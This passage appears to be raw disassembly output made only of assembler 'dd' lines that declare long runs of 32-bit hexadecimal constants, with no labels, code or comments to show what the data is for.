		dd 0E61C9BACh, 95069E6Fh, 5FB3FC3Ah, 26592353h,	67558187h
		dd 1B23DCD8h, 0B4519BDBh, 8E5A25FEh, 66A1773Ch,	35099536h
		dd 7BFE18A3h, 163B6DB4h, 32EE4A19h, 8BE8892Dh, 14C8074h
		dd 0B0F1EBA5h, 5A0652E1h, 0FC4F1C09h, 0AEF96F6Ch, 0E9B16CEBh
		dd 0A0FDCC40h, 0AD4A3C1Bh, 35A6FE57h, 0B96B45A3h, 0CDE90963h
		dd 792DF2ABh, 0FB5E688Fh, 15E05EC5h, 0B17BDCFAh, 5316D34Ah
		dd 0B71B55h, 58982C4h, 99FED19h, 7DF6D58Dh, 0B3D1E842h
		dd 891FB1C8h, 0EBE0BC96h, 1EE43717h, 524C928Bh,	47D4C3ECh
		dd 0B538E012h, 124D5530h, 97236407h, 0FE78ED9Bh, 0B217E562h
		dd 4CF91EDEh, 5D15FBD4h, 29E8F037h, 0C4C2DBA9h,	0DE89E1D5h
		dd 40B120FBh, 681D2D5Dh, 78197EB4h, 6F5A6155h, 514015F4h
		dd 0C1EE27A6h, 0E0F1BC45h, 8B92DB86h, 0B73F60E1h, 0A9C3B8EFh
		dd 0B1EABD34h, 6E4C8AEEh, 0AA0076F6h, 350BC1B2h, 24C39FD2h
		dd 7434BB5Fh, 9145F985h, 0FEB5B890h, 0E787AC40h, 2A830B47h
		dd 7B2657C3h, 2EAE44CBh, 82495594h, 926CC943h, 0F6FB37A9h
		dd 296A0273h, 0F666EAD5h, 0B5921DFBh, 0A025A0E6h, 62D77DDBh
		dd 97EC0E8Bh, 0AE727460h, 0D29CDB31h, 47FC9534h, 56613FA3h
		dd 0B5538CCFh, 0CC9BBA78h, 0CDEB1EB2h, 0EED76095h, 48D4FE1Dh
		dd 828DCCB0h, 0A8F5C63Eh, 0EE3434FAh, 19BD4C0Eh, 2245CEF0h
		dd 22B7C4E8h, 80DCFC54h, 0F3BC8958h, 48706CD0h,	80083C20h
		dd 0D55E780Eh, 0D9DFECD2h, 12FBF034h, 781A35ECh, 2C8A0A14h
		dd 96878886h, 0E9B5FED4h, 56ACD95Ah, 0A95EA9B4h, 2E2C4DE5h
		dd 0EFC66E6Ah, 301ECC6Bh, 0A86C0CFh, 0BF15823Ah, 5B507C8Ah
		dd 9AC18FB0h, 5CDA9F6Ah, 8BB8A901h, 6EAF91A7h, 5F39F66Ah
		dd 8D137C39h, 0A78B48D3h, 0CB3FB451h, 5C710334h, 0D2F981F9h
		dd 7CD5760Dh, 26045F72h, 42D2EBEEh, 556FB9BBh, 0A4BED607h
		dd 3F214E1Ah, 5E11B0FCh, 0F7195168h, 5EB5AB0Eh,	0AAA61CC2h
		dd 6BCDC0E3h, 0AAED34D8h, 83802DE1h, 0BDBB989Ch, 8BAC9B98h
		dd 9E63BD36h, 85903B54h, 7FBE8A65h, 45A2312Eh, 0F6FA06F9h
		dd 0B2EAAF83h, 1EE96033h, 0C487FB17h, 4881F3AEh, 862708F1h
		dd 2EBB7E3Fh, 0A45BACE6h, 4E3D6D72h, 84077671h,	0C707B61Bh
		dd 0C4DF5D2Bh, 0ECEBCB15h, 8AE648AFh, 0C6456634h, 0F6AB190Fh
		dd 0BF906BCAh, 0DF154DF0h, 1F805596h, 5C0A211Ah, 0F380A217h
		dd 0BAF24B44h, 0EEE3DBCDh, 147DB680h, 0DD58EA67h, 0FCB826BAh
		dd 0BA07A8F5h, 3CF1E6Fh, 70AEB7B7h, 1D5DCB14h, 0CEE97B41h
		dd 48B31AA8h, 0A7DB773Ah, 5B249AE9h, 25569CC2h,	3168CAE8h
		dd 0A1183040h, 0AB17E7DCh, 4E76E7CCh, 9BF1C57h,	8BD6A994h
		dd 0A79B8AEFh, 0BD4F201Ah, 87ABE6EFh, 0EFD88A34h, 0F59CC306h
		dd 58A10AE6h, 77031F5Ch, 0DCBA28F6h, 0B188F1FCh, 0F8619400h
		dd 5B8477CFh, 0E1F796A5h, 931BD678h, 364FF089h,	0B7FC07C5h
		dd 5509CC8Bh, 0CE90EC09h, 2E057DC2h, 0B45E55C6h, 0D8AE2644h
		dd 6BBFC113h, 0CA3E702h, 5A8D6ABFh, 5BF66B17h, 7172A34Dh
		dd 0F0F4C89Dh, 6B94D71Bh, 0A731D4DAh, 4E95A9D8h, 0F3AF9E04h
		dd 65501551h, 5C7FD8C0h, 252C8458h, 0A6A62C4h, 0BA6AE116h
		dd 0D87CCD6Ah, 2458181Ch, 751362AFh, 0B7FA98BEh, 6FF8A010h
		dd 58A7D0E6h, 83D5C8D5h, 6228DD61h, 861EF9E4h, 0A53D1898h
		dd 0D6852CFAh, 0EB8F56DCh, 0D8BE2D4h, 82860A5Fh, 0E7EECE42h
		dd 0B2007118h, 2E752A0Ah, 0A0B6A537h, 5953EB13h, 0E2B1C8FAh
		dd 72DA283Eh, 0FEA5B188h, 0EB7ADCABh, 0E1FD35D5h, 7A8A34B1h
		dd 968ED0F1h, 0BAD995B5h, 26C8A119h, 5DEE927Dh,	2B4ADE46h
		dd 49A253E7h, 7493F818h, 79E7B085h, 0E9AA3AB2h,	0D5A76151h
		dd 0B8D4F1BDh, 59B1490Dh, 3FFD2B7h, 0EEDFB45Fh,	0AFA53F1Fh
		dd 0A73E47D2h, 0AB6DFA1Bh, 58DE98B7h, 3F4B6825h, 0EF336B5Fh
		dd 5EF7B5F6h, 8CBF4208h, 0BA8D8F51h, 6AB98F9h, 1BC154C2h
		dd 429F90AFh, 14B9AD87h, 716E1FBh, 0BC62200Eh, 1279C77Ch
		dd 0E77AD72Ch, 267018BDh, 6A342AA2h, 973E6275h,	0E726617Bh
		dd 965276ABh, 0B8A704C1h, 0AEC32A0Eh, 295E7382h, 0AC14E4CCh
		dd 0DF5B60EFh, 31C1A62Ah, 3EFCF634h, 9B9CAD60h,	0A85332FCh
		dd 1AF4DFDFh, 0D0DAB089h, 0ED2EAACh, 0AA45E257h, 575EBFB6h
		dd 0DC41364Ah, 0C440144Eh, 0B39C6FBEh, 92E096BFh, 3ABC5738h
		dd 0CF6965E1h, 0FC27EADDh, 0EFC22AD0h, 70B84E52h, 0DE5476A2h
		dd 0ABD07C92h, 0B279AF8Ch, 579F380Fh, 27EBD62Dh, 0EA145157h
		dd 303FDF7Dh, 0D69DC4FAh, 0E3BE59EDh, 0A8EFC487h, 4F3F8EF7h
		dd 0BED29DB5h, 8B843299h, 0E41A4452h, 3921C597h, 0ABC6D9E0h
		dd 6E97F994h, 34DA1598h, 7E834037h, 970B2425h, 3C1FD16Bh
		dd 0E97C3805h, 0B1470431h, 7AAD5609h, 0A4DFC516h, 18E7DD44h
		dd 0BE2D7EB0h, 0BE5BEC07h, 84BFD073h, 4ED609CEh, 0F9B3BA2Dh
		dd 0AFECE00Bh, 96D5DFE8h, 0C5091A7Fh, 0EA16440Bh, 5DDFA251h
		dd 9285A825h, 0E7DE0AE2h, 692CDB40h, 332C542Bh,	9FEE34E6h
		dd 3933A9BCh, 0A17C1D67h, 39D6736Ah, 0AEACB770h, 8734BAE8h
		dd 28A6F09Dh, 0D3AF4713h, 32F0ADDCh, 0B7777690h, 6A88DF00h
		dd 0B76A0DCh, 0C289F621h, 0A29E6643h, 0CD35FD7h, 91E488CCh
		dd 0F236A455h, 0FF899F55h, 9F016CE2h, 97661949h, 7870FC60h
		dd 3EFDBAD9h, 5FF4D29Ch, 4A506F77h, 0C53475B2h,	0AD681F28h
		dd 0B19EBCC2h, 429D7C4h
		dd 5FDF2740h, 665976EAh, 0D8D5C68Ah, 0C1E05700h, 51CDF72Dh
		dd 0F77449Ah, 525AEBE9h, 1D30F620h, 2EF174D1h, 0E5CD46EAh
		dd 1A9E8AD8h, 0C7172B1Fh, 35A53A8Bh, 66DB96FBh,	0C0F8997Fh
		dd 2916DF5Fh, 6E34F75Dh, 0EDD4D555h, 5295A6DBh,	530E3420h
		dd 42B9FFB1h, 86BF00Fh,	0EACE0B8Ch, 591A0D81h, 0C307645Ah
		dd 56AF97E7h, 6506E176h, 0CCF51CD7h, 0DCE5EFE4h, 0F125667Fh
		dd 0ED016B03h, 0D67731B9h, 94DB9783h, 527FB182h, 0B0D872A4h
		dd 22E0B60Bh, 3CB4A601h, 0FD3F522Fh, 61B3262Bh,	2B3F6566h
		dd 2BD56215h, 0F4C939E1h, 22D16A55h, 0D2651F40h, 8DC50957h
		dd 57A42750h, 0AD9ED2E1h, 0DDA2AF98h, 0D67A2F51h, 95D961A0h
		dd 3BF8B2BBh, 0FC7D1EB4h, 0D3ED4F90h, 2EBD72C6h, 5D48ABB6h
		dd 48625139h, 0F961D099h, 21F805D5h, 0C95B0B6Fh, 0A2512955h
		dd 16984024h, 0F3C4E299h, 0BB46EE17h, 0A05885AAh, 9F7E522Bh
		dd 6552CAE9h, 0AEF83ECFh, 0CA887ECCh, 6EA2E71Bh, 4C258403h
		dd 0FAF42AEAh, 0EF9BA2CEh, 0EBDBDA57h, 77BB8D65h, 4C018351h
		dd 37439E04h, 88CEBA18h, 0BA02E1D6h, 3EAC62F7h,	9ABC9BA5h
		dd 4CA4E984h, 516857F5h, 0B83C31DBh, 4C2A8E6Bh,	0B5CA3C59h
		dd 0FE49B7C5h, 0F9236079h, 0AC319D46h, 74FF9EAAh, 5F9771FFh
		dd 0E34C842Dh, 94BBD487h, 0AA8D1231h, 8C356720h, 9CFD2979h
		dd 0B805C84Fh, 41B9654Ah, 0C7E164B1h, 119D52D4h, 81B65570h
		dd 0E0F3FA41h, 6B7CE3BCh, 0E69B9F2Dh, 529CB957h, 511A7342h
		dd 0F3E1B3FCh, 586C8E89h, 66F76E06h, 3EAE2AC7h,	95AB1F38h
		dd 44ADFCFFh, 1B964432h, 67A20C93h, 5DBD2DFEh, 572B9F20h
		dd 0B7314400h, 0AA80A84Ah, 2BB8794Eh, 3571ACBEh, 71AB67Eh
		dd 0E5DBA55Fh, 0A04C8D7Dh, 3767474Dh, 1F7BAE70h, 0B1CDD5B9h
		dd 8AB403FDh, 33E5E5EAh, 334B7B9Bh, 72AE80ECh, 7B96F7E0h
		dd 73B27017h, 0A878296Fh, 601689BFh, 0A86090BDh, 2A1E63E4h
		dd 85F5783Ah, 469FAC9Bh, 59B4078Eh, 0C1E24C25h,	0C46F5E4Ah
		dd 0FA29EEC2h, 0F1BCD970h, 0B082B473h, 2FAD6E53h, 0E45C6CF9h
		dd 1ABC2084h, 0EC10ABAFh, 212FE105h, 703E02D7h,	8E15ADC2h
		dd 0CA82A9B6h, 3E45572Fh, 0CE93E82Ah, 439932CFh, 0E2163777h
		dd 0AEA780D5h, 32748563h, 19DD4A71h, 0F2AEFEA2h, 1A28CFF4h
		dd 58F886D6h, 0F497A1D9h, 75128817h, 0CDC10713h, 0F3512A0Dh
		dd 6E081AFBh, 0BBB9E5A4h, 0D58A19CCh, 0D1024ED7h, 7C500E35h
		dd 9334F83Ah, 5E9B06BEh, 0A38531B8h, 0B8F382C3h, 2B1BFBh
		dd 204A792Fh, 0C0FC2F85h, 0E9C737B4h, 8C3363BAh, 85E0CA1Fh
		dd 3A035D03h, 0F5F8D0C7h, 604457CBh, 8AE43C98h,	87E0DC7Bh
		dd 0E7D9D555h, 9A7C3E15h, 0B9D31204h, 0BF77C56Ch, 2861EEC5h
		dd 9A6925A3h, 0AF1B48A6h, 2DCE332Fh, 42B4CBBEh,	8D25ED50h
		dd 3F2B9BD1h, 7F4DD6CCh, 0CF8D9B4Ah, 12FDF18h, 0CB608F21h
		dd 7E23E0E5h, 13CC7B48h, 0CE3FB91Dh, 6F143FDCh,	0D457FC55h
		dd 3A77BD52h, 0DC862C3Ah, 9E501CB9h, 0CBDDA7A9h, 0E959A4ADh
		dd 9AB9CD70h, 0B6686948h, 0E7DFC27Eh, 3345D7CEh, 0EF028FE8h
		dd 12FE3170h, 0AA720D77h, 0C3D9710h, 0E9AFBF9Fh, 3CC65AD1h
		dd 164841ABh, 0E0AAB829h, 4D2BEF69h, 948116F1h,	0DD3C5295h
		dd 5DD22524h, 0C8FBAEADh, 5C4A1EBAh, 0C0351EACh, 0B20AD161h
		dd 7C3C9B66h, 4DDDB85Bh, 2D68B579h, 155DC95Bh, 0DDB2FCF7h
		dd 7B51371h, 9B88ED56h,	0EED52529h, 0ACED3BBCh,	759E77ABh
		dd 0FD3E6837h, 27BB75F6h, 8D9A5F4Dh, 74FA83C3h,	0C686F9E8h
		dd 568A9573h, 0ABBA5C6Ah, 0BD6EA50Eh, 0D7D25350h, 0AC003A72h
		dd 75BAF2C4h, 0D145DBD2h, 82773581h, 17D80A78h,	0C1B4E7A7h
		dd 0F57CBE4Dh, 31BC5294h, 0C2C9C76h, 60B65D08h,	0BF922248h
		dd 7D6929E3h, 0E361A12Ah, 0DC4585Ah, 0FA997F8Ah, 79B4073h
		dd 5674FE44h, 9BEF8619h, 97376CCEh, 0F85CD7C0h,	10BE8CA0h
		dd 910392A9h, 6B6AC48Fh, 293CE1D6h, 0F5F9FE8Ch,	4F80C62Fh
		dd 0A6FC234h, 0C1D263F1h, 78955269h, 25E77F95h,	0D6BEAE56h
		dd 9757B6F6h, 31CFC6Ch,	213413CBh, 0D55ADF4h, 86F4762Bh
		dd 804D7D9Eh, 0F8D6B371h, 2F97A12Eh, 0ED8C6AF7h, 91568733h
		dd 0AA6A3C5Fh, 0E719CBE7h, 0C2E81491h, 99CBE98Bh, 73767EB9h
		dd 0C048A9ADh, 35BB913Eh, 9EF75AAEh, 0F4C30860h, 20E1AA31h
		dd 0BBE068Dh, 0EFCB62FAh, 943226A3h, 3D9F4E77h,	0BE3F9629h
		dd 0EB7B12FFh, 2AAF334h, 8571DE7Eh, 1E047423h, 8AB21C25h
		dd 5FA4A779h, 0F06D5B10h, 0A1EBA80Dh, 605395DCh, 0F2344473h
		dd 0BF1A1EBFh, 29C4E6BDh, 0E7C10CF7h, 0F2C0D48Eh, 0F8AA0731h
		dd 77A6F467h, 7A7C7F51h, 5CBB8B8Ch, 282797F7h, 346D1626h
		dd 0E61333F5h, 7DAC05FCh, 0E1BDED72h, 0B8791A42h, 853849B9h
		dd 0DFCE5414h, 48AEF565h, 331B8C5Bh, 0ED2A561Fh, 4C1EB8BAh
		dd 0C7379A7Bh, 0E9FFBCAFh, 398A9A85h, 0FA05FFFh, 6E7A9DCFh
		dd 503A0D9Fh, 5FF207CDh, 1191E7EFh, 0EADBC93Fh,	761598FCh
		dd 2539D5B9h, 0ED7DFE3h, 0F0E581Fh, 5527BB58h, 0CBD60EFBh
		dd 0CF428ACAh, 992D41F6h, 5ADC7F7Ah, 694010E3h,	0E890A2C9h
		dd 0F61D9B4Ch, 0AAEEB824h, 0EAED09B0h, 0DBC055D3h, 4E319A63h
		dd 0B6D1ABEEh, 0D77DF9FFh, 405041C2h, 205C8AB8h, 67BCF2B2h
		dd 86F4E358h, 9757522Bh, 30F33F07h, 83F5AF1h, 485BD398h
		dd 4198DD5h, 0FF41B752h, 0AC2BBD09h, 656BA715h,	0C033FF98h
		dd 949874C6h, 530CBFBDh, 510D422Bh, 57089765h, 0BDEEA135h
		dd 5754EE86h, 175D1B43h, 0A58B6D48h, 50A45270h,	0F4CB3E7Bh
		dd 7A6B0A44h, 2EA29824h, 1FDF60E6h, 1D9FA026h, 0A5D6E3E7h
		dd 71AA9204h, 9574C618h, 899D8BA8h, 35FAF1Bh, 0A09E6633h
		dd 0A9E71A1h, 27F42565h, 64B4AF5Fh, 0B589971Ch,	0BCBB4BC3h
		dd 0C6C2FC92h, 0EE22B029h, 27EC4365h, 71C5D139h, 3378A73Eh
		dd 106523A2h, 0F93AB2A9h, 6BCF246Bh, 834EC0D8h,	8323C9A3h
		dd 0BBD5C542h, 212B65CEh, 0CBF047A2h, 1C49B04Fh, 0D1C73971h
		dd 0FBE8705Dh, 1DFC8577h, 0F432FAA5h, 3A9E607Eh, 0C5D4304Fh
		dd 6C2AE587h, 849FF20Ch, 1B758AA8h, 4074DFBEh, 2F42B4ACh
		dd 0D842EFA3h, 55541A68h, 0ED85CD91h, 362DB9EFh, 0C1E075C1h
		dd 86DF8F37h, 0BB724200h, 385A9599h, 2ABAD19Dh,	7FA643D0h
		dd 0CC086366h, 4717B445h, 0E65EC87Dh, 0FAB5CB52h, 45417AB8h
		dd 555586DAh, 4E12BE5Fh, 0A5292891h, 677E4756h,	582FCE7Ch
		dd 420948A6h, 0D16976E5h, 0D5326EE2h, 298B7D71h, 0BEA71805h
		dd 0F0D6CE59h, 0FD547D21h, 0FC391671h, 7E698B46h, 306A50FCh
		dd 0B7F5E98h, 0A5CA588Dh, 9D107DDEh, 0A6E7988Dh, 0A9D20D3Ch
		dd 7539D847h, 23EBE599h, 0ECAAC39Ah, 0EE76EB85h, 0FCA21637h
		dd 0A9638DFAh, 526B7CAAh, 0E1C425A0h, 3A11C9C1h, 2555303Eh
		dd 0D7178AA4h, 766DEB11h, 0B8F6D277h, 0B6172378h, 83DA3AC8h
		dd 8DAE719Ah, 0DAC9F9D6h, 64E00DA6h, 3F5A256Eh,	0F3E574F0h
		dd 316C6BAh, 0FCC8DC44h, 7CEA368h, 0A4E96632h, 0D2A26289h
		dd 3441E116h, 0EC50DC1Eh, 2FBEF866h, 7F75703Ch,	0CEE46E63h
		dd 644B6A34h, 0EDBDD57Eh, 0FCAB0607h, 0F527F558h, 0FDD03006h
		dd 0B6D82545h, 4E942A45h, 8994B331h, 549FEC68h,	0A9E19FA3h
		dd 4F721E4Ah, 0F66A4C39h, 8091EE9h, 5B91D390h, 8D855EFBh
		dd 8EB7145Bh, 0DB757530h, 0FF6F0E91h, 0F33DF9A8h, 5489BEF0h
		dd 9D070558h, 0FD68F189h
		dd 2A1C5D63h, 40A41AABh, 0C0FC27BFh, 7DD0011Ah,	255722E6h
		dd 0E7C9BB41h, 20DC6FD4h, 0B24055CFh, 554E0B95h, 0F6C8ADD7h
		dd 4AB8C63Ah, 0E3F01A31h, 0EF1ADC6Ch, 0C80B122Bh, 0ABB778Eh
		dd 8E8D3029h, 5BBF3716h, 87134DBCh, 0C2AD407Fh,	0F12D936Eh
		dd 9DE8F012h, 5756DA98h, 0D3E01659h, 0C9C26D48h, 35D43D3Bh
		dd 170BFD51h, 0B72AAE45h, 0F6FB4623h, 23B2F32Fh, 0ED7C3721h
		dd 0F41EE525h, 93E95633h, 2B0BD3FAh, 0F86F2E8h,	0AFF4D68Dh
		dd 0FA0BE380h, 0C68755E9h, 3EB7065Bh, 42147030h, 20E430AFh
		dd 0C5136BD8h, 0ECF6F39h, 0FD408B2Eh, 0E4A0C899h, 312F8259h
		dd 1915D016h, 0B75A9EA8h, 37095239h, 8693987Eh,	959DBF68h
		dd 0F479A98Ah, 353EB00Ah, 18BE30FCh, 0FD9A7221h, 0D1831E04h
		dd 92783D77h, 0A503AE2Bh, 293CD7DFh, 4F177F9h, 0E07E1C5Bh
		dd 0A8956773h, 565B339Ah, 0AA463952h, 0FEECAB2Fh, 962759E1h
		dd 0BA8BCB0h, 3E70BA27h, 9F3F5CD8h, 8CC85289h, 8B4B83E7h
		dd 55DEFD60h, 3776ADD7h, 3F560352h, 1BF1732Dh, 0F3F92548h
		dd 0E48558C0h, 9C25B5BDh, 0AAFFD562h, 96A84F71h, 0FC84B7Ch
		dd 48F60DA2h, 0E67D7623h, 14556A76h, 0EE04F7E8h, 945AE86Eh
		dd 1C84F18h, 0A9742EC2h, 601A6C26h, 0AB72FA91h,	3C5CBBDCh
		dd 8D067992h, 0DD89CBB1h, 0E809EA5Fh, 402B2923h, 0FE587CF5h
		dd 51F3E082h, 232A52D8h, 5A593FC8h, 0B58D542Fh,	227FCD62h
		dd 5D48FE3h, 0DA4B7ED4h, 5F9F943Bh, 900AAD45h, 2E91D9F4h
		dd 0AC2893A0h, 0AB484D47h, 7FB38251h, 1EA45426h, 392358AAh
		dd 0EE154DFFh, 0EC65DC7Ch, 0EDECD8E2h, 0B4C3862h, 27F7C0F0h
		dd 0C156F1F8h, 0D73C34F2h, 0A7E5C6E6h, 0DC246BD6h, 0E2575410h
		dd 36CA54E7h, 0AEED1F8Eh, 9DA817F2h, 8F05093Bh,	297FAC20h
		dd 87E240C3h, 0BEDA8C54h, 0A0E823ABh, 69BFC713h, 5AAF9C62h
		dd 34B54B31h, 7732E922h, 0D7B4CB49h, 3D991AFDh,	53165267h
		dd 0F87882E4h, 0C5729B7Dh, 7897DC0Ch, 823696F2h, 0BAEFFABCh
		dd 49241CCh, 6EC9ACEBh,	0B437376h, 7EE7E4Fh, 0DD665EFBh
		dd 884B670Ah, 71529ED8h, 7DFEAAFh, 0F333AE26h, 7F88A681h
		dd 68BA25FBh, 87E13441h, 0D56619AFh, 89E72EDBh,	962334D8h
		dd 0F0ABCA43h, 975580C2h, 3BD940A1h, 552BF325h,	83B6F77Ah
		dd 0B7D1CABBh, 0EBE442D1h, 0EBAAF66Ah, 7DE69D54h, 0A2E6A783h
		dd 39385A6Eh, 0F9177067h, 77F8DD35h, 27D08506h,	0E4D9C796h
		dd 588D01DDh, 0E2E77DC1h, 5816E540h, 375B6B8Ch,	0D1CD5539h
		dd 5C912F52h, 4CE7E138h, 0BEFDAA5h, 8D622B77h, 15E1AF77h
		dd 5F397A8Ch, 9849CD72h, 6ABB5972h, 7766C50Dh, 74808259h
		dd 1EBBB497h, 0E523D455h, 0DAD606E6h, 0FB0F049Ch, 3B0E5587h
		dd 0CFE4C771h, 39574425h, 386BDBE5h, 40C073E1h,	0EFB0E9F4h
		dd 8B458718h, 77DFF152h, 0BB7F7ABFh, 0BDAD15B2h, 5116136Ch
		dd 85565AE8h, 77F8AD65h, 2AFC39C8h, 0FA6BEEF4h,	7F3EEACBh
		dd 82552127h, 694B52D5h, 0AE01D61Eh, 0C612A364h, 0B08D1E7h
		dd 74171950h, 76EB1F1Dh, 5543B677h, 468F381Dh, 1313701h
		dd 0E4F59059h, 0EC5DB05Fh, 74395E13h, 8BA29043h, 0C50FA593h
		dd 79A467C6h, 4CB6C062h, 7F1F48BFh, 8DFE63CAh, 0BAD18083h
		dd 0C5ECFF36h, 66DD06CEh, 0FE764B6Fh, 52B1C1CBh, 1D5B30B9h
		dd 0EA84C564h, 5567C5CDh, 9E4BFE72h, 2AEFA655h,	8B79602Ah
		dd 6C524A02h, 0A2ABA3A8h, 9DFD6C58h, 35CFDFCDh,	0E83CAF82h
		dd 396862ABh, 0A5687A2Ch, 60F317DEh, 0D232B7F6h, 0D2F974Ah
		dd 477346CDh, 8583C2C9h, 0F8CCF990h, 666949E1h,	1988EC35h
		dd 2D4540F2h, 0AD459C82h, 325866B1h, 8B4552ADh,	0A4FBB526h
		dd 0A6F8EB20h, 89566E7Ch, 77C43D6Ch, 6111B22Ah,	0FBF10BE2h
		dd 0BB2210C9h, 0EE2CB5DBh, 2598588Dh, 0E190DAE6h, 96B2DCA1h
		dd 1369ECB5h, 0D54CE7ACh, 41B56D75h, 1CD75CFFh,	27F7581Fh
		dd 795101A8h, 308CEAF0h, 0AA47B46h, 1E76536Ch, 0F485F718h
		dd 22C11AEBh, 99D33F91h, 0FB16E7AAh, 1951BBC2h,	9C9E8E5Fh
		dd 4916C928h, 0A6951BA0h, 38B9C0FDh, 2AAFB9EFh,	3429ACF1h
		dd 1468952Dh, 0A40DF64Bh, 0FB32B5Dh, 35985623h,	44C98E5Ah
		dd 0FBDBD744h, 0DFA9F58Eh, 280BF4ADh, 77780ABBh, 6785505Dh
		dd 1A911EC3h, 88D0E1DFh, 0B0F57229h, 379170AEh,	0A0FB0289h
		dd 0A3237EF3h, 0D45795E5h, 8626C2C6h, 512C580Dh, 0DD94AF4Fh
		dd 0C3248A63h, 0CA7F5B59h, 3C0FEBDBh, 0CA5BAD19h, 0E6B0ACD7h
		dd 75B18956h, 5EB2037Dh, 9CDF03ADh, 0DC39AEFCh,	4521EA94h
		dd 9D512BB1h, 0CB641A49h, 59AC24BEh, 0EB3A7380h, 4060DD14h
		dd 0B7A00EFFh, 0E6CA60CEh, 3BC8ABE7h, 0F1DBF8A0h, 0AEA18D43h
		dd 8485FC62h, 0B854A2Ch, 155E6CE1h, 551596D4h, 1D64C247h
		dd 61E8F608h, 3C1B49DDh, 67FC6167h, 6C5F4503h, 0A11977BDh
		dd 79F6DEBEh, 772FE5B8h, 48182D08h, 0D9AC7D39h,	1A506AE1h
		dd 8EF0A3EAh, 0DFE820CAh, 0FBEAC0B1h, 0CD9EC6ADh, 7745768Ah
		dd 22BBCD9Ch, 0F2E8B249h, 9B65708Bh, 0FAA71AC3h, 0FF427798h
		dd 0B157E28Dh, 25B05713h, 2FA46D52h, 0D1D4465Eh, 0D834F905h
		dd 0B721CB3Dh, 0D99E21A8h, 67AE68EFh, 0C32A9D4Bh, 4EDE3F64h
		dd 99621E66h, 427096C7h, 0B1E0B4AAh, 0D6A01EF1h, 14A2B76h
		dd 62CA4BCDh, 0CDD4417Dh, 49688156h, 8DB76BECh,	86222D1Ch
		dd 7951480Ch, 1AED493Ch, 59A223Eh, 9ED16317h, 2B7F3BBCh
		dd 4691C820h, 0C59ABF9Eh, 0BE613C39h, 1DC22F9Fh, 2BAA27D7h
		dd 49AE5321h, 98A11113h, 314A09F6h, 9C877725h, 0E9DAFB2Dh
		dd 99EBD8D8h, 95E100BEh, 0C2003982h, 211390C5h,	6C74D6BDh
		dd 0A02F6E17h, 0B12DCA29h, 0DAEAAF7Ch, 0BD36E6CCh, 0D6090799h
		dd 94D6D344h, 9B6B5652h, 56AD2421h, 6B732866h, 68741A4Ch
		dd 0C2A7B1FEh, 3B3556F5h, 5B43F7DFh, 6C36BCE6h,	3C487EA9h
		dd 2EA46842h, 942E8735h, 968B656Ch, 46BFFCB3h, 53A5168Ch
		dd 79DBD3EEh, 0F619FA60h, 40DD1D9Bh, 0CF99FBBh,	5745A6ABh
		dd 317157C1h, 0C14777B6h, 0D5134EF9h, 0CC3BF08Ch, 76F5FBF9h
		dd 0E5F9A3D1h, 0BE89422Eh, 4F6B12C2h, 88BBD6FEh, 630DE9D6h
		dd 94AAF68Bh, 5E602370h, 89783090h, 0A4B51712h,	9B118160h
		dd 0FEBBDF33h, 0CE0768D0h, 0C646B3FAh, 0F83F9339h, 0E7E07765h
		dd 93A32A25h, 0BBED5FE3h, 0A26313DCh, 5520096Ch, 89D875F5h
		dd 0A162EA79h, 263A254Ch, 0AE933913h, 0F2595FEBh, 0E3BA077Dh
		dd 5CA084B3h, 0FF8C03C5h, 0ED9ACFA2h, 211DF781h, 5A8596A3h
		dd 64FD98A1h, 0B9E3FE03h, 6AEEAB71h, 7A56F8ABh,	468B5D36h
		dd 11D1B098h, 7D0BF0AEh, 0A63AFEFh, 0BAAFE80h, 0A84C78E1h
		dd 0F5DEFA2Eh, 373B6966h, 87E16E2Eh, 0E6B5335Bh, 9E16AD35h
		dd 0D2756AE5h, 0AABFFA66h, 0F5725F6Dh, 5EBD2AC0h, 475558EDh
		dd 87E5FE8Ch, 0B85043C6h, 5967380Ah, 0E9F1968Eh, 0AC178812h
		dd 0D2747FB5h, 7C0ADF8Bh, 8D881C26h, 9016B5A2h,	5139FF2Bh
		dd 0DB7DBB7Fh, 89D43EAEh, 0E282CEA5h, 0D162F363h, 0F91B73FCh
		dd 0E79EF8F5h, 0DDBDFFCDh, 0D75D0E5Ah, 687D4C0h, 7F8393CFh
		dd 0E939A384h, 0BEAA035Ch, 668397F5h, 4247A451h, 46AE2DCDh
		dd 0D6B8D073h, 0AF264DFh, 5FCD3FD9h, 4ADACEE4h,	0F1921085h
		dd 0EA3CA47Fh, 6F7D7292h, 0DA99954Dh, 820C5FE2h, 8DBD7CC5h
		dd 194E7ACFh, 0B04954F4h, 42402C8Fh, 9B0A54DAh,	30BFA311h
		dd 92EA471Eh, 0EFD2A952h
		dd 255D954Fh, 0F2E1B462h, 0F9B3585Bh, 0C22D7DF0h, 0FC6A6103h
		dd 71145257h, 0FB55D815h, 0FC758548h, 0C5EED57h, 0E53B4585h
		dd 7BF99966h, 36FEE695h, 7EF2E3Dh, 56A16BACh, 65B1C0B8h
		dd 54D3D1B0h, 0BC059758h, 5339EEFCh, 5688FCFBh,	3D3C235Fh
		dd 5307C68Bh, 32136917h, 11ED4557h, 0BDF09927h,	247FDBB1h
		dd 0FEBF81DAh, 0D3F338F4h, 0E43D81E7h, 7A829C86h, 3E47FA39h
		dd 0EDBAE17Eh, 0E7FB4FCBh, 7FC2AA1Ah, 68E21362h, 9C07242Fh
		dd 3B4974B6h, 0DB87F20Eh, 7B51AF2Ah, 1856A390h,	0E06A4C77h
		dd 0C5A2A82Ah, 7F172E48h, 0AB13FC17h, 0F7AA6A06h, 3C90EF2Fh
		dd 0E579DD77h, 69F230B6h, 75A25190h, 4DCBDECEh,	0FDFCB16Ch
		dd 0A89E7B3Bh, 0ADAD5727h, 97686ED1h, 84BBB8C4h, 0F13AD747h
		dd 0E874E0ECh, 0EB727355h, 0C3186EE6h, 6A006AE2h, 8773A235h
		dd 519E0CEAh, 294B509h,	0AB0F960Ch, 1C6EBAAAh, 7CD39417h
		dd 518C096Eh, 0DB7F2142h, 0DB768CDBh, 35957A08h, 0BEBEBD62h
		dd 4D75A357h, 0EACB2555h, 0C02D4B03h, 35D17CC5h, 0AA3A7B5Ah
		dd 235FBC8Eh, 0F6EF25D1h, 0EDD21D24h, 1859ED68h, 0C145BAB9h
		dd 51E64085h, 63545B68h, 0F9232DD8h, 703FE9DBh,	622FB9E5h
		dd 0E6FC6E74h, 0B515C62Fh, 7E43CF3Ch, 2B1A0E24h, 1B2564F7h
		dd 0DBD9DA29h, 940EF501h, 0C05FD64Fh, 5BD91867h, 0F0CD8D1Dh
		dd 0D7AAC674h, 0BD45A681h, 18BDA98Bh, 9A94FF8Ch, 5C77F3C6h
